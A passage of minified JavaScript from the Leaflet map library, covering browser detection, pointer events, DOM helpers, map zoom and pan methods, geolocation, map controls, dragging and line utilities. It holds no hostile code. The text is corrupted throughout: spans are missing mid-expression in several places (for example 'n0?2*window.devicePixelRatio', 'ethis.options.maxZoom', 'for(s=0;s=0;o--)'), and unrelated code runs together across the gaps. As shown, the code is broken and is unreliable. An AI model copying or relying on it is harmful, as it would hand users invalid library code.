t}(),so=function(){return!!document.createElement("canvas").getContext}(),Xe=!!(document.createElementNS&&Oi("svg").createSVGRect),ro=!!Xe&&function(){var t=document.createElement("div");return t.innerHTML=" ",(t.firstChild&&t.firstChild.namespaceURI)==="http://www.w3.org/2000/svg"}(),ao=!Xe&&function(){try{var t=document.createElement("div");t.innerHTML=' ';var e=t.firstChild;return e.style.behavior="url(#default#VML)",e&&typeof e.adj=="object"}catch{return!1}}(),ho=navigator.platform.indexOf("Mac")===0,uo=navigator.platform.indexOf("Linux")===0;function St(t){return navigator.userAgent.toLowerCase().indexOf(t)>=0}var T={ie:Te,ielt9:qn,edge:Ii,webkit:Ke,android:Ai,android23:Bi,androidStock:Kn,opera:Ye,chrome:Ni,gecko:Di,safari:Yn,phantom:Ri,opera12:Fi,win:Jn,ie3d:Hi,webkit3d:Je,gecko3d:Wi,any3d:Xn,mobile:ae,mobileWebkit:Qn,mobileWebkit3d:$n,msPointer:Ui,pointer:Vi,touch:to,touchNative:Gi,mobileOpera:eo,mobileGecko:io,retina:no,passiveEvents:oo,canvas:so,svg:Xe,vml:ao,inlineSvg:ro,mac:ho,linux:uo},qi=T.msPointer?"MSPointerDown":"pointerdown",ji=T.msPointer?"MSPointerMove":"pointermove",Ki=T.msPointer?"MSPointerUp":"pointerup",Yi=T.msPointer?"MSPointerCancel":"pointercancel",Qe={touchstart:qi,touchmove:ji,touchend:Ki,touchcancel:Yi},Ji={touchstart:po,touchmove:Me,touchend:Me,touchcancel:Me},Xt={},Xi=!1;function lo(t,e,i){return e==="touchstart"&&mo(),Ji[e]?(i=Ji[e].bind(this,i),t.addEventListener(Qe[e],i,!1),i):(console.warn("wrong event specified:",e),v)}function co(t,e,i){if(!Qe[e]){console.warn("wrong event specified:",e);return}t.removeEventListener(Qe[e],i,!1)}function fo(t){Xt[t.pointerId]=t}function _o(t){Xt[t.pointerId]&&(Xt[t.pointerId]=t)}function Qi(t){delete Xt[t.pointerId]}function mo(){Xi||(document.addEventListener(qi,fo,!0),document.addEventListener(ji,_o,!0),document.addEventListener(Ki,Qi,!0),document.addEventListener(Yi,Qi,!0),Xi=!0)}function Me(t,e){if(e.pointerType!==(e.MSPOINTER_TYPE_MOUSE||"mouse")){e.touches=[];for(var i in Xt)e.touches.push(Xt[i]);e.changedTouches=[e],t(e)}}function po(t,e){e.MSPOINTER_TYPE_TOUCH&&e.pointerType===e.MSPOINTER_TYPE_TOUCH&&ut(e),Me(t,e)}function vo(t){var e={},i,n;for(n in t)i=t[n],e[n]=i&&i.bind?i.bind(t):i;return t=e,e.type="dblclick",e.detail=2,e.isTrusted=!1,e._simulated=!0,e}var go=200;function yo(t,e){t.addEventListener("dblclick",e);var i=0,n;function o(s){if(s.detail!==1){n=s.detail;return}if(!(s.pointerType==="mouse"||s.sourceCapabilities&&!s.sourceCapabilities.firesTouchEvents)){var r=on(s);if(!(r.some(function(u){return u instanceof HTMLLabelElement&&u.attributes.for})&&!r.some(function(u){return u instanceof HTMLInputElement||u instanceof HTMLSelectElement}))){var a=Date.now();a-i<=go?(n++,n===2&&e(vo(s))):n=1,i=a}}}return t.addEventListener("click",o),{dblclick:e,simDblclick:o}}function wo(t,e){t.removeEventListener("dblclick",e.dblclick),t.removeEventListener("click",e.simDblclick)}var $e=ke(["transform","webkitTransform","OTransform","MozTransform","msTransform"]),he=ke(["webkitTransition","transition","OTransition","MozTransition","msTransition"]),$i=he==="webkitTransition"||he==="OTransition"?he+"End":"transitionend";function tn(t){return typeof t=="string"?document.getElementById(t):t}function ue(t,e){var i=t.style[e]||t.currentStyle&&t.currentStyle[e];if((!i||i==="auto")&&document.defaultView){var n=document.defaultView.getComputedStyle(t,null);i=n?n[e]:null}return i==="auto"?null:i}function U(t,e,i){var n=document.createElement(t);return n.className=e||"",i&&i.appendChild(n),n}function $(t){var e=t.parentNode;e&&e.removeChild(t)}function Ce(t){for(;t.firstChild;)t.removeChild(t.firstChild)}function Qt(t){var e=t.parentNode;e&&e.lastChild!==t&&e.appendChild(t)}function $t(t){var e=t.parentNode;e&&e.firstChild!==t&&e.insertBefore(t,e.firstChild)}function ti(t,e){if(t.classList!==void 0)return t.classList.contains(e);var i=Se(t);return i.length>0&&new RegExp("(^|\\s)"+e+"(\\s|$)").test(i)}function A(t,e){if(t.classList!==void 0)for(var i=x(e),n=0,o=i.length;n0?2*window.devicePixelRatio:1;function rn(t){return T.edge?t.wheelDeltaY/2:t.deltaY&&t.deltaMode===0?-t.deltaY/Lo:t.deltaY&&t.deltaMode===1?-t.deltaY*20:t.deltaY&&t.deltaMode===2?-t.deltaY*60:t.deltaX||t.deltaZ?0:t.wheelDelta?(t.wheelDeltaY||t.wheelDelta)/2:t.detail&&Math.abs(t.detail)<32765?-t.detail*20:t.detail?t.detail/-32765*60:0}function fi(t,e){var i=e.relatedTarget;if(!i)return!0;try{for(;i&&i!==t;)i=i.parentNode}catch{return!1}return i!==t}var bo={__proto__:null,on:I,off:K,stopPropagation:jt,disableScrollPropagation:ci,disableClickPropagation:de,preventDefault:ut,stop:Kt,getPropagationPath:on,getMousePosition:sn,getWheelDelta:rn,isExternalTarget:fi,addListener:I,removeListener:K},an=Ht.extend({run:function(t,e,i,n){this.stop(),this._el=t,this._inProgress=!0,this._duration=i||.25,this._easeOutPower=1/Math.max(n||.5,.2),this._startPos=qt(t),this._offset=e.subtract(this._startPos),this._startTime=+new Date,this.fire("start"),this._animate()},stop:function(){this._inProgress&&(this._step(!0),this._complete())},_animate:function(){this._animId=X(this._animate,this),this._step()},_step:function(t){var e=+new Date-this._startTime,i=this._duration*1e3;ethis.options.maxZoom)?this.setZoom(t):this},panInsideBounds:function(t,e){this._enforcingBounds=!0;var i=this.getCenter(),n=this._limitCenter(i,this._zoom,it(t));return i.equals(n)||this.panTo(n,e),this._enforcingBounds=!1,this},panInside:function(t,e){e=e||{};var i=Z(e.paddingTopLeft||e.padding||[0,0]),n=Z(e.paddingBottomRight||e.padding||[0,0]),o=this.project(this.getCenter()),s=this.project(t),r=this.getPixelBounds(),a=pt([r.min.add(i),r.max.subtract(n)]),u=a.getSize();if(!a.contains(s)){this._enforcingBounds=!0;var c=s.subtract(a.getCenter()),y=a.extend(s).getSize().subtract(u);o.x+=c.x<0?-y.x:y.x,o.y+=c.y<0?-y.y:y.y,this.panTo(this.unproject(o),e),this._enforcingBounds=!1}return this},invalidateSize:function(t){if(!this._loaded)return this;t=l({animate:!1,pan:!0},t===!0?{animate:!0}:t);var e=this.getSize();this._sizeChanged=!0,this._lastCenter=null;var i=this.getSize(),n=e.divideBy(2).round(),o=i.divideBy(2).round(),s=n.subtract(o);return!s.x&&!s.y?this:(t.animate&&t.pan?this.panBy(s):(t.pan&&this._rawPanBy(s),this.fire("move"),t.debounceMoveend?(clearTimeout(this._sizeTimer),this._sizeTimer=setTimeout(_(this.fire,this,"moveend"),200)):this.fire("moveend")),this.fire("resize",{oldSize:e,newSize:i}))},stop:function(){return this.setZoom(this._limitZoom(this._zoom)),this.options.zoomSnap||this.fire("viewreset"),this._stop()},locate:function(t){if(t=this._locateOptions=l({timeout:1e4,watch:!1},t),!("geolocation"in navigator))return this._handleGeolocationError({code:0,message:"Geolocation not supported."}),this;var e=_(this._handleGeolocationResponse,this),i=_(this._handleGeolocationError,this);return t.watch?this._locationWatchId=navigator.geolocation.watchPosition(e,i,t):navigator.geolocation.getCurrentPosition(e,i,t),this},stopLocate:function(){return navigator.geolocation&&navigator.geolocation.clearWatch&&navigator.geolocation.clearWatch(this._locationWatchId),this._locateOptions&&(this._locateOptions.setView=!1),this},_handleGeolocationError:function(t){if(this._container._leaflet_id){var e=t.code,i=t.message||(e===1?"permission denied":e===2?"position unavailable":"timeout");this._locateOptions.setView&&!this._loaded&&this.fitWorld(),this.fire("locationerror",{code:e,message:"Geolocation error: "+i+"."})}},_handleGeolocationResponse:function(t){if(this._container._leaflet_id){var e=t.coords.latitude,i=t.coords.longitude,n=new j(e,i),o=n.toBounds(t.coords.accuracy*2),s=this._locateOptions;if(s.setView){var r=this.getBoundsZoom(o);this.setView(n,s.maxZoom?Math.min(r,s.maxZoom):r)}var a={latlng:n,bounds:o,timestamp:t.timestamp};for(var u in t.coords)typeof t.coords[u]=="number"&&(a[u]=t.coords[u]);this.fire("locationfound",a)}},addHandler:function(t,e){if(!e)return this;var i=this[t]=new e(this);return this._handlers.push(i),this.options[t]&&i.enable(),this},remove:function(){if(this._initEvents(!0),this.options.maxBounds&&this.off("moveend",this._panInsideMaxBounds),this._containerId!==this._container._leaflet_id)throw new Error("Map container is being reused by another instance");try{delete this._container._leaflet_id,delete this._containerId}catch{this._container._leaflet_id=void 0,this._containerId=void 0}this._locationWatchId!==void 0&&this.stopLocate(),this._stop(),$(this._mapPane),this._clearControlPos&&this._clearControlPos(),this._resizeRequest&&(dt(this._resizeRequest),this._resizeRequest=null),this._clearHandlers(),this._loaded&&this.fire("unload");var t;for(t in this._layers)this._layers[t].remove();for(t in this._panes)$(this._panes[t]);return this._layers=[],this._panes=[],delete this._mapPane,delete this._renderer,this},createPane:function(t,e){var i="leaflet-pane"+(t?" leaflet-"+t.replace("Pane","")+"-pane":""),n=U("div",i,e||this._mapPane);return t&&(this._panes[t]=n),n},getCenter:function(){return this._checkIfLoaded(),this._lastCenter&&!this._moved()?this._lastCenter.clone():this.layerPointToLatLng(this._getCenterLayerPoint())},getZoom:function(){return this._zoom},getBounds:function(){var t=this.getPixelBounds(),e=this.unproject(t.getBottomLeft()),i=this.unproject(t.getTopRight());return new vt(e,i)},getMinZoom:function(){return this.options.minZoom===void 0?this._layersMinZoom||0:this.options.minZoom},getMaxZoom:function(){return this.options.maxZoom===void 0?this._layersMaxZoom===void 0?1/0:this._layersMaxZoom:this.options.maxZoom},getBoundsZoom:function(t,e,i){t=it(t),i=Z(i||[0,0]);var n=this.getZoom()||0,o=this.getMinZoom(),s=this.getMaxZoom(),r=t.getNorthWest(),a=t.getSouthEast(),u=this.getSize().subtract(i),c=pt(this.project(a,n),this.project(r,n)).getSize(),y=T.any3d?this.options.zoomSnap:1,C=u.x/c.x,N=u.y/c.y,_t=e?Math.max(C,N):Math.min(C,N);return n=this.getScaleZoom(_t,n),y&&(n=Math.round(n/(y/100))*(y/100),n=e?Math.ceil(n/y)*y:Math.floor(n/y)*y),Math.max(o,Math.min(s,n))},getSize:function(){return(!this._size||this._sizeChanged)&&(this._size=new E(this._container.clientWidth||0,this._container.clientHeight||0),this._sizeChanged=!1),this._size.clone()},getPixelBounds:function(t,e){var i=this._getTopLeftPoint(t,e);return new Q(i,i.add(this.getSize()))},getPixelOrigin:function(){return this._checkIfLoaded(),this._pixelOrigin},getPixelWorldBounds:function(t){return this.options.crs.getProjectedBounds(t===void 0?this.getZoom():t)},getPane:function(t){return typeof t=="string"?this._panes[t]:t},getPanes:function(){return this._panes},getContainer:function(){return this._container},getZoomScale:function(t,e){var i=this.options.crs;return e=e===void 0?this._zoom:e,i.scale(t)/i.scale(e)},getScaleZoom:function(t,e){var i=this.options.crs;e=e===void 0?this._zoom:e;var n=i.zoom(t*i.scale(e));return isNaN(n)?1/0:n},project:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.latLngToPoint(F(t),e)},unproject:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.pointToLatLng(Z(t),e)},layerPointToLatLng:function(t){var e=Z(t).add(this.getPixelOrigin());return this.unproject(e)},latLngToLayerPoint:function(t){var e=this.project(F(t))._round();return e._subtract(this.getPixelOrigin())},wrapLatLng:function(t){return this.options.crs.wrapLatLng(F(t))},wrapLatLngBounds:function(t){return this.options.crs.wrapLatLngBounds(it(t))},distance:function(t,e){return this.options.crs.distance(F(t),F(e))},containerPointToLayerPoint:function(t){return Z(t).subtract(this._getMapPanePos())},layerPointToContainerPoint:function(t){return Z(t).add(this._getMapPanePos())},containerPointToLatLng:function(t){var e=this.containerPointToLayerPoint(Z(t));return this.layerPointToLatLng(e)},latLngToContainerPoint:function(t){return this.layerPointToContainerPoint(this.latLngToLayerPoint(F(t)))},mouseEventToContainerPoint:function(t){return sn(t,this._container)},mouseEventToLayerPoint:function(t){return this.containerPointToLayerPoint(this.mouseEventToContainerPoint(t))},mouseEventToLatLng:function(t){return this.layerPointToLatLng(this.mouseEventToLayerPoint(t))},_initContainer:function(t){var e=this._container=tn(t);if(e){if(e._leaflet_id)throw new Error("Map container is already initialized.")}else throw new Error("Map container not found.");I(e,"scroll",this._onScroll,this),this._containerId=g(e)},_initLayout:function(){var t=this._container;this._fadeAnimated=this.options.fadeAnimation&&T.any3d,A(t,"leaflet-container"+(T.touch?" leaflet-touch":"")+(T.retina?" leaflet-retina":"")+(T.ielt9?" leaflet-oldie":"")+(T.safari?" leaflet-safari":"")+(this._fadeAnimated?" leaflet-fade-anim":""));var e=ue(t,"position");e!=="absolute"&&e!=="relative"&&e!=="fixed"&&e!=="sticky"&&(t.style.position="relative"),this._initPanes(),this._initControlPos&&this._initControlPos()},_initPanes:function(){var t=this._panes={};this._paneRenderers={},this._mapPane=this.createPane("mapPane",this._container),nt(this._mapPane,new E(0,0)),this.createPane("tilePane"),this.createPane("overlayPane"),this.createPane("shadowPane"),this.createPane("markerPane"),this.createPane("tooltipPane"),this.createPane("popupPane"),this.options.markerZoomAnimation||(A(t.markerPane,"leaflet-zoom-hide"),A(t.shadowPane,"leaflet-zoom-hide"))},_resetView:function(t,e,i){nt(this._mapPane,new E(0,0));var n=!this._loaded;this._loaded=!0,e=this._limitZoom(e),this.fire("viewprereset");var o=this._zoom!==e;this._moveStart(o,i)._move(t,e)._moveEnd(o),this.fire("viewreset"),n&&this.fire("load")},_moveStart:function(t,e){return t&&this.fire("zoomstart"),e||this.fire("movestart"),this},_move:function(t,e,i,n){e===void 0&&(e=this._zoom);var o=this._zoom!==e;return this._zoom=e,this._lastCenter=t,this._pixelOrigin=this._getNewPixelOrigin(t),n?i&&i.pinch&&this.fire("zoom",i):((o||i&&i.pinch)&&this.fire("zoom",i),this.fire("move",i)),this},_moveEnd:function(t){return t&&this.fire("zoomend"),this.fire("moveend")},_stop:function(){return dt(this._flyToFrame),this._panAnim&&this._panAnim.stop(),this},_rawPanBy:function(t){nt(this._mapPane,this._getMapPanePos().subtract(t))},_getZoomSpan:function(){return this.getMaxZoom()-this.getMinZoom()},_panInsideMaxBounds:function(){this._enforcingBounds||this.panInsideBounds(this.options.maxBounds)},_checkIfLoaded:function(){if(!this._loaded)throw new Error("Set map center and zoom first.")},_initEvents:function(t){this._targets={},this._targets[g(this._container)]=this;var e=t?K:I;e(this._container,"click dblclick mousedown mouseup mouseover mouseout mousemove contextmenu keypress keydown keyup",this._handleDOMEvent,this),this.options.trackResize&&e(window,"resize",this._onResize,this),T.any3d&&this.options.transform3DLimit&&(t?this.off:this.on).call(this,"moveend",this._onMoveEnd)},_onResize:function(){dt(this._resizeRequest),this._resizeRequest=X(function(){this.invalidateSize({debounceMoveend:!0})},this)},_onScroll:function(){this._container.scrollTop=0,this._container.scrollLeft=0},_onMoveEnd:function(){var t=this._getMapPanePos();Math.max(Math.abs(t.x),Math.abs(t.y))>=this.options.transform3DLimit&&this._resetView(this.getCenter(),this.getZoom())},_findEventTargets:function(t,e){for(var i=[],n,o=e==="mouseout"||e==="mouseover",s=t.target||t.srcElement,r=!1;s;){if(n=this._targets[g(s)],n&&(e==="click"||e==="preclick")&&this._draggableMoved(n)){r=!0;break}if(n&&n.listens(e,!0)&&(o&&!fi(s,t)||(i.push(n),o))||s===this._container)break;s=s.parentNode}return!i.length&&!r&&!o&&this.listens(e,!0)&&(i=[this]),i},_isClickDisabled:function(t){for(;t&&t!==this._container;){if(t._leaflet_disable_click)return!0;t=t.parentNode}},_handleDOMEvent:function(t){var e=t.target||t.srcElement;if(!(!this._loaded||e._leaflet_disable_events||t.type==="click"&&this._isClickDisabled(e))){var i=t.type;i==="mousedown"&&ri(e),this._fireDOMEvent(t,i)}},_mouseEvents:["click","dblclick","mouseover","mouseout","contextmenu"],_fireDOMEvent:function(t,e,i){if(t.type==="click"){var n=l({},t);n.type="preclick",this._fireDOMEvent(n,n.type,i)}var o=this._findEventTargets(t,e);if(i){for(var s=[],r=0;r0?Math.round(t-e)/2:Math.max(0,Math.ceil(t))-Math.max(0,Math.floor(e))},_limitZoom:function(t){var e=this.getMinZoom(),i=this.getMaxZoom(),n=T.any3d?this.options.zoomSnap:1;return n&&(t=Math.round(t/n)*n),Math.max(e,Math.min(i,t))},_onPanTransitionStep:function(){this.fire("move")},_onPanTransitionEnd:function(){tt(this._mapPane,"leaflet-pan-anim"),this.fire("moveend")},_tryAnimatedPan:function(t,e){var i=this._getCenterOffset(t)._trunc();return(e&&e.animate)!==!0&&!this.getSize().contains(i)?!1:(this.panBy(i,e),!0)},_createAnimProxy:function(){var t=this._proxy=U("div","leaflet-proxy leaflet-zoom-animated");this._panes.mapPane.appendChild(t),this.on("zoomanim",function(e){var i=$e,n=this._proxy.style[i];Gt(this._proxy,this.project(e.center,e.zoom),this.getZoomScale(e.zoom,1)),n===this._proxy.style[i]&&this._animatingZoom&&this._onZoomTransitionEnd()},this),this.on("load moveend",this._animMoveEnd,this),this._on("unload",this._destroyAnimProxy,this)},_destroyAnimProxy:function(){$(this._proxy),this.off("load moveend",this._animMoveEnd,this),delete this._proxy},_animMoveEnd:function(){var t=this.getCenter(),e=this.getZoom();Gt(this._proxy,this.project(t,e),this.getZoomScale(e,1))},_catchTransitionEnd:function(t){this._animatingZoom&&t.propertyName.indexOf("transform")>=0&&this._onZoomTransitionEnd()},_nothingToAnimate:function(){return!this._container.getElementsByClassName("leaflet-zoom-animated").length},_tryAnimatedZoom:function(t,e,i){if(this._animatingZoom)return!0;if(i=i||{},!this._zoomAnimated||i.animate===!1||this._nothingToAnimate()||Math.abs(e-this._zoom)>this.options.zoomAnimationThreshold)return!1;var n=this.getZoomScale(e),o=this._getCenterOffset(t)._divideBy(1-1/n);return i.animate!==!0&&!this.getSize().contains(o)?!1:(X(function(){this._moveStart(!0,i.noMoveStart||!1)._animateZoom(t,e,!0)},this),!0)},_animateZoom:function(t,e,i,n){this._mapPane&&(i&&(this._animatingZoom=!0,this._animateToCenter=t,this._animateToZoom=e,A(this._mapPane,"leaflet-zoom-anim")),this.fire("zoomanim",{center:t,zoom:e,noUpdate:n}),this._tempFireZoomEvent||(this._tempFireZoomEvent=this._zoom!==this._animateToZoom),this._move(this._animateToCenter,this._animateToZoom,void 0,!0),setTimeout(_(this._onZoomTransitionEnd,this),250))},_onZoomTransitionEnd:function(){this._animatingZoom&&(this._mapPane&&tt(this._mapPane,"leaflet-zoom-anim"),this._animatingZoom=!1,this._move(this._animateToCenter,this._animateToZoom,void 0,!0),this._tempFireZoomEvent&&this.fire("zoom"),delete this._tempFireZoomEvent,this.fire("move"),this._moveEnd(!0))}});function To(t,e){return new H(t,e)}var Mt=lt.extend({options:{position:"topright"},initialize:function(t){k(this,t)},getPosition:function(){return this.options.position},setPosition:function(t){var e=this._map;return e&&e.removeControl(this),this.options.position=t,e&&e.addControl(this),this},getContainer:function(){return this._container},addTo:function(t){this.remove(),this._map=t;var e=this._container=this.onAdd(t),i=this.getPosition(),n=t._controlCorners[i];return A(e,"leaflet-control"),i.indexOf("bottom")!==-1?n.insertBefore(e,n.firstChild):n.appendChild(e),this._map.on("unload",this.remove,this),this},remove:function(){return this._map?($(this._container),this.onRemove&&this.onRemove(this._map),this._map.off("unload",this.remove,this),this._map=null,this):this},_refocusOnMap:function(t){this._map&&t&&t.screenX>0&&t.screenY>0&&this._map.getContainer().focus()}}),_e=function(t){return new Mt(t)};H.include({addControl:function(t){return t.addTo(this),this},removeControl:function(t){return t.remove(),this},_initControlPos:function(){var t=this._controlCorners={},e="leaflet-",i=this._controlContainer=U("div",e+"control-container",this._container);function n(o,s){var r=e+o+" "+e+s;t[o+s]=U("div",r,i)}n("top","left"),n("top","right"),n("bottom","left"),n("bottom","right")},_clearControlPos:function(){for(var t in this._controlCorners)$(this._controlCorners[t]);$(this._controlContainer),delete this._controlCorners,delete this._controlContainer}});var hn=Mt.extend({options:{collapsed:!0,position:"topright",autoZIndex:!0,hideSingleBase:!1,sortLayers:!1,sortFunction:function(t,e,i,n){return i1,this._baseLayersList.style.display=t?"":"none"),this._separator.style.display=e&&t?"":"none",this},_onLayerChange:function(t){this._handlingClick||this._update();var e=this._getLayer(g(t.target)),i=e.overlay?t.type==="add"?"overlayadd":"overlayremove":t.type==="add"?"baselayerchange":null;i&&this._map.fire(i,e)},_createRadioElement:function(t,e){var i=' ",n=document.createElement("div");return n.innerHTML=i,n.firstChild},_addItem:function(t){var e=document.createElement("label"),i=this._map.hasLayer(t.layer),n;t.overlay?(n=document.createElement("input"),n.type="checkbox",n.className="leaflet-control-layers-selector",n.defaultChecked=i):n=this._createRadioElement("leaflet-base-layers_"+g(this),i),this._layerControlInputs.push(n),n.layerId=g(t.layer),I(n,"click",this._onInputClick,this);var o=document.createElement("span");o.innerHTML=" "+t.name;var s=document.createElement("span");e.appendChild(s),s.appendChild(n),s.appendChild(o);var r=t.overlay?this._overlaysList:this._baseLayersList;return r.appendChild(e),this._checkDisabledLayers(),e},_onInputClick:function(){if(!this._preventClick){var t=this._layerControlInputs,e,i,n=[],o=[];this._handlingClick=!0;for(var s=t.length-1;s>=0;s--)e=t[s],i=this._getLayer(e.layerId).layer,e.checked?n.push(i):e.checked||o.push(i);for(s=0;s=0;o--)e=t[o],i=this._getLayer(e.layerId).layer,e.disabled=i.options.minZoom!==void 0&&ni.options.maxZoom},_expandIfNotCollapsed:function(){return this._map&&!this.options.collapsed&&this.expand(),this},_expandSafely:function(){var t=this._section;this._preventClick=!0,I(t,"click",ut),this.expand();var e=this;setTimeout(function(){K(t,"click",ut),e._preventClick=!1})}}),Mo=function(t,e,i){return new hn(t,e,i)},di=Mt.extend({options:{position:"topleft",zoomInText:'+ ',zoomInTitle:"Zoom in",zoomOutText:'− ',zoomOutTitle:"Zoom out"},onAdd:function(t){var e="leaflet-control-zoom",i=U("div",e+" leaflet-bar"),n=this.options;return this._zoomInButton=this._createButton(n.zoomInText,n.zoomInTitle,e+"-in",i,this._zoomIn),this._zoomOutButton=this._createButton(n.zoomOutText,n.zoomOutTitle,e+"-out",i,this._zoomOut),this._updateDisabled(),t.on("zoomend zoomlevelschange",this._updateDisabled,this),i},onRemove:function(t){t.off("zoomend zoomlevelschange",this._updateDisabled,this)},disable:function(){return this._disabled=!0,this._updateDisabled(),this},enable:function(){return this._disabled=!1,this._updateDisabled(),this},_zoomIn:function(t){!this._disabled&&this._map._zoomthis._map.getMinZoom()&&this._map.zoomOut(this._map.options.zoomDelta*(t.shiftKey?3:1))},_createButton:function(t,e,i,n,o){var s=U("a",i,n);return s.innerHTML=t,s.href="#",s.title=e,s.setAttribute("role","button"),s.setAttribute("aria-label",e),de(s),I(s,"click",Kt),I(s,"click",o,this),I(s,"click",this._refocusOnMap,this),s},_updateDisabled:function(){var t=this._map,e="leaflet-disabled";tt(this._zoomInButton,e),tt(this._zoomOutButton,e),this._zoomInButton.setAttribute("aria-disabled","false"),this._zoomOutButton.setAttribute("aria-disabled","false"),(this._disabled||t._zoom===t.getMinZoom())&&(A(this._zoomOutButton,e),this._zoomOutButton.setAttribute("aria-disabled","true")),(this._disabled||t._zoom===t.getMaxZoom())&&(A(this._zoomInButton,e),this._zoomInButton.setAttribute("aria-disabled","true"))}});H.mergeOptions({zoomControl:!0}),H.addInitHook(function(){this.options.zoomControl&&(this.zoomControl=new di,this.addControl(this.zoomControl))});var Co=function(t){return new di(t)},un=Mt.extend({options:{position:"bottomleft",maxWidth:100,metric:!0,imperial:!0},onAdd:function(t){var e="leaflet-control-scale",i=U("div",e),n=this.options;return this._addScales(n,e+"-line",i),t.on(n.updateWhenIdle?"moveend":"move",this._update,this),t.whenReady(this._update,this),i},onRemove:function(t){t.off(this.options.updateWhenIdle?"moveend":"move",this._update,this)},_addScales:function(t,e,i){t.metric&&(this._mScale=U("div",e,i)),t.imperial&&(this._iScale=U("div",e,i))},_update:function(){var t=this._map,e=t.getSize().y/2,i=t.distance(t.containerPointToLatLng([0,e]),t.containerPointToLatLng([this.options.maxWidth,e]));this._updateScales(i)},_updateScales:function(t){this.options.metric&&t&&this._updateMetric(t),this.options.imperial&&t&&this._updateImperial(t)},_updateMetric:function(t){var e=this._getRoundNum(t),i=e<1e3?e+" m":e/1e3+" km";this._updateScale(this._mScale,i,e/t)},_updateImperial:function(t){var e=t*3.2808399,i,n,o;e>5280?(i=e/5280,n=this._getRoundNum(i),this._updateScale(this._iScale,n+" mi",n/i)):(o=this._getRoundNum(e),this._updateScale(this._iScale,o+" ft",o/e))},_updateScale:function(t,e,i){t.style.width=Math.round(this.options.maxWidth*i)+"px",t.innerHTML=e},_getRoundNum:function(t){var e=Math.pow(10,(Math.floor(t)+"").length-1),i=t/e;return i=i>=10?10:i>=5?5:i>=3?3:i>=2?2:1,e*i}}),So=function(t){return new un(t)},ko=' ',_i=Mt.extend({options:{position:"bottomright",prefix:''+(T.inlineSvg?ko+" ":"")+"Leaflet "},initialize:function(t){k(this,t),this._attributions={}},onAdd:function(t){t.attributionControl=this,this._container=U("div","leaflet-control-attribution"),de(this._container);for(var e in t._layers)t._layers[e].getAttribution&&this.addAttribution(t._layers[e].getAttribution());return this._update(),t.on("layeradd",this._addAttribution,this),this._container},onRemove:function(t){t.off("layeradd",this._addAttribution,this)},_addAttribution:function(t){t.layer.getAttribution&&(this.addAttribution(t.layer.getAttribution()),t.layer.once("remove",function(){this.removeAttribution(t.layer.getAttribution())},this))},setPrefix:function(t){return this.options.prefix=t,this._update(),this},addAttribution:function(t){return t?(this._attributions[t]||(this._attributions[t]=0),this._attributions[t]++,this._update(),this):this},removeAttribution:function(t){return t?(this._attributions[t]&&(this._attributions[t]--,this._update()),this):this},_update:function(){if(this._map){var t=[];for(var e in this._attributions)this._attributions[e]&&t.push(e);var i=[];this.options.prefix&&i.push(this.options.prefix),t.length&&i.push(t.join(", ")),this._container.innerHTML=i.join(' | ')}}});H.mergeOptions({attributionControl:!0}),H.addInitHook(function(){this.options.attributionControl&&new _i().addTo(this)});var Eo=function(t){return new _i(t)};Mt.Layers=hn,Mt.Zoom=di,Mt.Scale=un,Mt.Attribution=_i,_e.layers=Mo,_e.zoom=Co,_e.scale=So,_e.attribution=Eo;var Et=lt.extend({initialize:function(t){this._map=t},enable:function(){return this._enabled?this:(this._enabled=!0,this.addHooks(),this)},disable:function(){return this._enabled?(this._enabled=!1,this.removeHooks(),this):this},enabled:function(){return!!this._enabled}});Et.addTo=function(t,e){return t.addHandler(e,this),this};var zo={Events:et},ln=T.touch?"touchstart mousedown":"mousedown",Ut=Ht.extend({options:{clickTolerance:3},initialize:function(t,e,i,n){k(this,n),this._element=t,this._dragStartTarget=e||t,this._preventOutline=i},enable:function(){this._enabled||(I(this._dragStartTarget,ln,this._onDown,this),this._enabled=!0)},disable:function(){this._enabled&&(Ut._dragging===this&&this.finishDrag(!0),K(this._dragStartTarget,ln,this._onDown,this),this._enabled=!1,this._moved=!1)},_onDown:function(t){if(this._enabled&&(this._moved=!1,!ti(this._element,"leaflet-zoom-anim"))){if(t.touches&&t.touches.length!==1){Ut._dragging===this&&this.finishDrag();return}if(!(Ut._dragging||t.shiftKey||t.which!==1&&t.button!==1&&!t.touches)&&(Ut._dragging=this,this._preventOutline&&ri(this._element),ni(),le(),!this._moving)){this.fire("down");var e=t.touches?t.touches[0]:t,i=en(this._element);this._startPoint=new E(e.clientX,e.clientY),this._startPos=qt(this._element),this._parentScale=ai(i);var n=t.type==="mousedown";I(document,n?"mousemove":"touchmove",this._onMove,this),I(document,n?"mouseup":"touchend touchcancel",this._onUp,this)}}},_onMove:function(t){if(this._enabled){if(t.touches&&t.touches.length>1){this._moved=!0;return}var e=t.touches&&t.touches.length===1?t.touches[0]:t,i=new E(e.clientX,e.clientY)._subtract(this._startPoint);!i.x&&!i.y||Math.abs(i.x)+Math.abs(i.y)s&&(r=a,s=u);s>i&&(e[r]=1,pi(t,e,i,n,r),pi(t,e,i,r,o))}function Ao(t,e){for(var i=[t[0]],n=1,o=0,s=t.length;ne&&(i.push(t[n]),o=n);return oe.max.x&&(i|=2),t.ye.max.y&&(i|=8),i}function Bo(t,e){var i=e.x-t.x,n=e.y-t.y;return i*i+n*n}function me(t,e,i,n){var o=e.x,s=e.y,r=i.x-o,a=i.y-s,u=r*r+a*a,c;return u>0&&(c=((t.x-o)*r+(t.y-s)*a)/u,c>1?(o=i.x,s=i.y):c>0&&(o+=r*c,s+=a*c)),r=t.x-o,a=t.y-s,n?r*r+a*a:new E(o,s)}function xt(t){return!q(t[0])||typeof t[0][0]!="object"&&typeof t[0][0]<"u"}function vn(t){return console.warn("Deprecated use of _flat, please use L.LineUtil.isFlat instead."),xt(t)}function gn(t,e){var i,n,o,s,r,a,u,c;if(!t||t.length===0)throw new Error("latlngs not passed");xt(t)||(console.warn("latlngs are not flat! Only the first ring will be used"),t=t[0]);var y=F([0,0]),C=it(t),N=C.getNorthWest().distanceTo(C.getSouthWest())*C.getNorthEast().distanceTo(C.getNorthWest());N<1700&&(y=mi(t));var _t=t.length,at=[];for(i=0;i<_t;i++){var Lt=F(t[i]);at.push(e.project(F([Lt.lat-y.lat,Lt.lng-y.lng])))}for(i=0,n=0;i<_t-1;i++)n+=at[i].distanceTo(at[i+1])/2;if(n===0)c=at[0];else for(i=0,s=0;i<_t-1;i++)if(r=at[i],a=at[i+1],o=r.distanceTo(a),s+=o,s>n){u=(s-n)/o,c=[a.x-u*(a.x-r.x),a.y-u*(a.y-r.y)];break}var gt=e.unproject(Z(c));return 